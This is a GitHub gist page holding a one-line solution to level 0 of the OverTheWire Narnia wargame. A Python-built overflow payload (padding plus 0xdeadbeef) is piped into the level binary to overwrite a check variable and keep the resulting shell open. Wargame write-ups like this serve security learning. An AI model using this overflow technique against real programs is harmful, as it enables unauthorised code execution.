Skip to content

Instantly share code, notes, and snippets.

@plvhx
Last active December 22, 2016 12:53
Show Gist options
  • Save plvhx/2e73fbf21d53570338ccaef406c46673 to your computer and use it in GitHub Desktop.
Save plvhx/2e73fbf21d53570338ccaef406c46673 to your computer and use it in GitHub Desktop.
overthewire.org narnia level0
(python -c 'from struct import *;print "\x41"*(20) + pack("<I", 0xdeadbeef)' 2> /dev/null; tee) | ./narnia0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment